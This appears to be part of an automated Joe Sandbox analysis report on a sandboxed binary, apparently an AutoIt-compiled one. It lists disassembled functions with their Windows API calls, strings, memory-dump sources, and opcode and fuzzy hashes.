                                                              • Instruction ID: aa1d7ada3e99872487b96b93ef1020c27c81aad157fc4242d90d8ad788a03121
                                                              • Opcode Fuzzy Hash: fe161c8b597ec11c5d7ccb2f66b44ddd3c2a3ce41ac0b7f955dfbff99834462b
                                                              • Instruction Fuzzy Hash: B911E971900215AFDB346B70DC4AFDE77BCDF50B10F114165F556AA091EFB08A81EA51
                                                              Function 00CD4E80 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearInit
                                                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                              • API String ID: 2610073882-625585964
                                                              • Opcode ID: 1545494beda67423941ee8507fada3e5496661343e78cddf3a132d131a46b528
                                                              • Instruction ID: b66b355636472c1dd12426bb903ff03e9b332eb5d552d88dbebe5e5e889e7a4e
                                                              • Opcode Fuzzy Hash: 1545494beda67423941ee8507fada3e5496661343e78cddf3a132d131a46b528
                                                              • Instruction Fuzzy Hash: EF91B471A00219AFDF24CFA5CC44FAEBBB8EF45714F10815AF615AB280D770AA45CFA0
                                                              Function 00CD42A4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VariantInit.OLEAUT32(?), ref: 00CD42C8
                                                              • CharUpperBuffW.USER32(?,?), ref: 00CD43D7
                                                              • _wcslen.LIBCMT ref: 00CD43E7
                                                              • VariantClear.OLEAUT32(?), ref: 00CD457C
                                                                • Part of subcall function 00CC15B3: VariantInit.OLEAUT32(00000000), ref: 00CC15F3
                                                                • Part of subcall function 00CC15B3: VariantCopy.OLEAUT32(?,?), ref: 00CC15FC
                                                                • Part of subcall function 00CC15B3: VariantClear.OLEAUT32(?), ref: 00CC1608
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                              • API String ID: 4137639002-1221869570
                                                              • Opcode ID: e74904a3da908dcf83f77dc61392c57dae1b01429c09ccd5d8b3cb1721aaf4f1
                                                              • Instruction ID: 7a6aa55b14ab762cf177eb1d83c5acde4a6c09c3b4f8622325d10b08857d99c6
                                                              • Opcode Fuzzy Hash: e74904a3da908dcf83f77dc61392c57dae1b01429c09ccd5d8b3cb1721aaf4f1
                                                              • Instruction Fuzzy Hash: C0916A756083459FC704DF28C48196AB7E5FF88314F14882EFA9A9B351DB30ED49DB52
                                                              Function 00CE2A5C Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetMenu.USER32(?), ref: 00CE2AE2
                                                              • GetMenuItemCount.USER32(00000000), ref: 00CE2B14
                                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00CE2B3C
                                                              • _wcslen.LIBCMT ref: 00CE2B72
                                                              • GetMenuItemID.USER32(?,?), ref: 00CE2BAC
                                                              • GetSubMenu.USER32(?,?), ref: 00CE2BBA
                                                                • Part of subcall function 00CB42CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 00CB42E6
                                                                • Part of subcall function 00CB42CC: GetCurrentThreadId.KERNEL32 ref: 00CB42ED
                                                                • Part of subcall function 00CB42CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00CB2E43), ref: 00CB42F4
                                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00CE2C42
                                                                • Part of subcall function 00CBF1A7: Sleep.KERNEL32 ref: 00CBF21F
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                              • String ID:
                                                              • API String ID: 4196846111-0
                                                              • Opcode ID: fcd7bea3a1d52f7360b21b6635685c9798550f9cc16c0b8b72b40a11969fcfdf
                                                              • Instruction ID: bcf44bdcd3bc37f98e943bf45ab46e7c92367cfd320ab364db345aeb3717c375
                                                              • Opcode Fuzzy Hash: fcd7bea3a1d52f7360b21b6635685c9798550f9cc16c0b8b72b40a11969fcfdf
                                                              • Instruction Fuzzy Hash: 7A71C136A00245AFDB14DF66C885BAEBBF5EF48310F108459E826EB341DB74EE41DB90
                                                              Function 00CE87FD Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • IsWindow.USER32(00000000), ref: 00CE8896
                                                              • IsWindowEnabled.USER32(00000000), ref: 00CE88A2
                                                              • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00CE897D
                                                              • SendMessageW.USER32(00000000,000000B0,?,?), ref: 00CE89B0
                                                              • IsDlgButtonChecked.USER32(?,00000000), ref: 00CE89E8
                                                              • GetWindowLongW.USER32(00000000,000000EC), ref: 00CE8A0A
                                                              • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00CE8A22
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                              • String ID:
                                                              • API String ID: 4072528602-0
                                                              • Opcode ID: 88799bac59d091afe309cea0fe00a40ab306c1c784443cb32bca7c5e1b0ca871
                                                              • Instruction ID: 86eba5a8fd2882a0334127495140a5291aec9a4c85bd21d48238e71bc26cbd26
                                                              • Opcode Fuzzy Hash: 88799bac59d091afe309cea0fe00a40ab306c1c784443cb32bca7c5e1b0ca871
                                                              • Instruction Fuzzy Hash: 0171D534A042C4AFDF359F56C894FBA7BB9EF09300F540459F869972A2CB31AE49DB11
                                                              Function 00CB808C Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CB80D1
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CB80F7
                                                              • SysAllocString.OLEAUT32(00000000), ref: 00CB80FA
                                                              • SysAllocString.OLEAUT32 ref: 00CB811B
                                                              • SysFreeString.OLEAUT32 ref: 00CB8124
                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00CB813E
                                                              • SysAllocString.OLEAUT32(?), ref: 00CB814C
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                              • String ID:
                                                              • API String ID: 3761583154-0
                                                              • Opcode ID: 3d6bc4582f56b5b321cf9beff695c4ac45efc7ee62bdcdf01533afcce1ba82b3
                                                              • Instruction ID: 8030c646cfe8e54debe1c1254b3ff84719124f090d8ec1776d589d76dc49c228
                                                              • Opcode Fuzzy Hash: 3d6bc4582f56b5b321cf9beff695c4ac45efc7ee62bdcdf01533afcce1ba82b3
                                                              • Instruction Fuzzy Hash: B4217475201204AF9B10AFACDC89EEE77ECEB49360B008125F915DB2E0DA74ED49CB64
                                                              Function 00CC0D8E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetStdHandle.KERNEL32(0000000C), ref: 00CC0DAE
                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00CC0DEA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: CreateHandlePipe
                                                              • String ID: nul
                                                              • API String ID: 1424370930-2873401336
                                                              • Opcode ID: 2fadd37b121a4ac434d0d8b86c9f6e5f6ca21d72d82ced5cdf93284db03c2076
                                                              • Instruction ID: 7d5bfcd13c295b4ff0ad53d24265d2074e02ea4e25a9bccc4c1074e8962ad0a8
                                                              • Opcode Fuzzy Hash: 2fadd37b121a4ac434d0d8b86c9f6e5f6ca21d72d82ced5cdf93284db03c2076
                                                              • Instruction Fuzzy Hash: A4213770540305EFDB209F69D844F9ABBA4AF45720F304E1DF9B2AB2E0D7709A40CB50
                                                              Function 00CC0E63 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00CC0E82
                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00CC0EBD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: CreateHandlePipe
                                                              • String ID: nul
                                                              • API String ID: 1424370930-2873401336
                                                              • Opcode ID: 0a82da2ac00304e4c4782312e49fcda09903f05ddf7762ff36e5ac2a0ced8aaf
                                                              • Instruction ID: 6c8b4ef3f0060a967b29c2a1708e405a6764458cd7738aef4f959716e4eea074
                                                              • Opcode Fuzzy Hash: 0a82da2ac00304e4c4782312e49fcda09903f05ddf7762ff36e5ac2a0ced8aaf
                                                              • Instruction Fuzzy Hash: 56211971504306EBDB209FA9DC44F9AB7A8AF55724F300A1DF9B1E72E0D7709A81CB61
                                                              Function 00CE4A0C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00C5771B: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00C57759
                                                                • Part of subcall function 00C5771B: GetStockObject.GDI32(00000011), ref: 00C5776D
                                                                • Part of subcall function 00C5771B: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C57777
                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00CE4A71
                                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00CE4A7E
                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00CE4A89
                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00CE4A98
                                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00CE4AA4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CreateObjectStockWindow
                                                              • String ID: Msctls_Progress32
                                                              • API String ID: 1025951953-3636473452
                                                              • Opcode ID: e61f7a7724bdca18a1cfcd3e2a049c3ac04e721618120a970b5e0b2665027f8f
                                                              • Instruction ID: d4ed2990c0c6799e1954bb68f30697fd25bdeb443ba50d2ed8d2f29c137d9a78
                                                              • Opcode Fuzzy Hash: e61f7a7724bdca18a1cfcd3e2a049c3ac04e721618120a970b5e0b2665027f8f
                                                              • Instruction Fuzzy Hash: 4711B6B114021DBEEF118F65DC85EE77F9DEF08758F004111FA18E6050CA769C61ABA4
                                                              Function 00CBE223 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00CBE23D
                                                              • LoadStringW.USER32(00000000), ref: 00CBE244
                                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00CBE25A
                                                              • LoadStringW.USER32(00000000), ref: 00CBE261
                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00CBE2A5
                                                              Strings
                                                              • %s (%d) : ==> %s: %s %s, xrefs: 00CBE282
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: HandleLoadModuleString$Message
                                                              • String ID: %s (%d) : ==> %s: %s %s
                                                              • API String ID: 4072794657-3128320259
                                                              • Opcode ID: f8406e0719ed819da87866bcd588361770a2e5f4cac1ce203b3c1bb77492af31
                                                              • Instruction ID: 46aba95ef84031ec14b38dc381ba3fbc0a5abd14cf313e6f406fe4da4b55bc02
                                                              • Opcode Fuzzy Hash: f8406e0719ed819da87866bcd588361770a2e5f4cac1ce203b3c1bb77492af31
                                                              • Instruction Fuzzy Hash: 290131F6900258BFE711ABE4DDC9FEB776CDB08700F0149A1B746EA051EA749E848B71
                                                              Function 00CD25BD Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00CD271D
                                                              • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00CD273E
                                                              • WSAGetLastError.WSOCK32 ref: 00CD274F
                                                              • htons.WSOCK32(?,?,?,?,?), ref: 00CD2838
                                                              • inet_ntoa.WSOCK32(?), ref: 00CD27E9
                                                                • Part of subcall function 00CB4277: _strlen.LIBCMT ref: 00CB4281
                                                                • Part of subcall function 00CD3B81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00CCF569), ref: 00CD3B9D
                                                              • _strlen.LIBCMT ref: 00CD2892
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                              • String ID:
                                                              • API String ID: 3203458085-0
                                                              • Opcode ID: 47165dc28a58b37f80432d9f15ff98dba976306b3eff5191061b2f3c31241365
                                                              • Instruction ID: 20e50e67ed2f2fbb5fb64bcc75b70e2d82c14e556a8892f9d46083fc2d991295
                                                              • Opcode Fuzzy Hash: 47165dc28a58b37f80432d9f15ff98dba976306b3eff5191061b2f3c31241365
                                                              • Instruction Fuzzy Hash: E5B1D335204300AFD324DF24C895E2ABBA5AF94318F54854DF5A64B3E2DB31EE86DB91
                                                              Function 00C80547 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __allrem.LIBCMT ref: 00C8044A
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C80466
                                                              • __allrem.LIBCMT ref: 00C8047D
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C8049B
                                                              • __allrem.LIBCMT ref: 00C804B2
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C804D0
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                              • String ID:
                                                              • API String ID: 1992179935-0
                                                              • Opcode ID: 2c635347f6fb7bc080f97231395b1708db1b00bed18cf3e190c3431c6bc10d53
                                                              • Instruction ID: ae2723a10ff6c8f0fef52608523d2248028eee647569ee177d2c970d887ec55d
                                                              • Opcode Fuzzy Hash: 2c635347f6fb7bc080f97231395b1708db1b00bed18cf3e190c3431c6bc10d53
                                                              • Instruction Fuzzy Hash: F0810972640706ABD764BE69CC81B6F73E8AF80328F34412EF561D7291E770DE059758
                                                              Function 00C8658E Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00C78669,00C78669,?,?,?,00C867DF,00000001,00000001,8BE85006), ref: 00C865E8
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00C867DF,00000001,00000001,8BE85006,?,?,?), ref: 00C8666E
                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00C86768
                                                              • __freea.LIBCMT ref: 00C86775
                                                                • Part of subcall function 00C83BB0: RtlAllocateHeap.NTDLL(00000000,?,?,?,00C76A99,?,0000015D,?,?,?,?,00C785D0,000000FF,00000000,?,?), ref: 00C83BE2
                                                              • __freea.LIBCMT ref: 00C8677E
                                                              • __freea.LIBCMT ref: 00C867A3
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1414292761-0
                                                              • Opcode ID: 06754cb1c33489f95d90bc33eeb67860284dd3e4711ab9c50f49d30cdc12dc7b
                                                              • Instruction ID: 876fb3dbe2eae623bdcf70ed349b20ce6c04027af05ffdc645744e26dc6b8690
                                                              • Opcode Fuzzy Hash: 06754cb1c33489f95d90bc33eeb67860284dd3e4711ab9c50f49d30cdc12dc7b
                                                              • Instruction Fuzzy Hash: 7E51F172600256AFEB24AF64CC82EBF77AAEB41B5CB154228FD24D7140EB34DD40D798
                                                              Function 00CDC53A Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00C5B25F: _wcslen.LIBCMT ref: 00C5B269
                                                                • Part of subcall function 00CDD2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CDC00D,?,?), ref: 00CDD314
                                                                • Part of subcall function 00CDD2F7: _wcslen.LIBCMT ref: 00CDD350
                                                                • Part of subcall function 00CDD2F7: _wcslen.LIBCMT ref: 00CDD3C7
                                                                • Part of subcall function 00CDD2F7: _wcslen.LIBCMT ref: 00CDD3FD
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CDC629
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CDC684
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00CDC6C9
                                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00CDC6F8
                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00CDC752
                                                              • RegCloseKey.ADVAPI32(?), ref: 00CDC75E
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                              • String ID:
                                                              • API String ID: 1120388591-0
                                                              • Opcode ID: 5337422af66a43b096e6ce6002a7db915194c911f0c2eb65e72bf8f868b17ed1
                                                              • Instruction ID: 1a9f2a3d12eb6de5e8b3ab74ccbb5b6879ace44f3d241eaafaac2ffe4b68446c
                                                              • Opcode Fuzzy Hash: 5337422af66a43b096e6ce6002a7db915194c911f0c2eb65e72bf8f868b17ed1
                                                              • Instruction Fuzzy Hash: A881BE75208241AFC714DF24C8C5E2ABBE5FF84308F14855DF55A8B2A2DB31ED46DB92
                                                              Function 00CB003D Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VariantInit.OLEAUT32(00000035), ref: 00CB0049
                                                              • SysAllocString.OLEAUT32(00000000), ref: 00CB00F0
                                                              • VariantCopy.OLEAUT32(00CB02F4,00000000), ref: 00CB0119
                                                              • VariantClear.OLEAUT32(00CB02F4), ref: 00CB013D
                                                              • VariantCopy.OLEAUT32(00CB02F4,00000000), ref: 00CB0141
                                                              • VariantClear.OLEAUT32(?), ref: 00CB014B
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
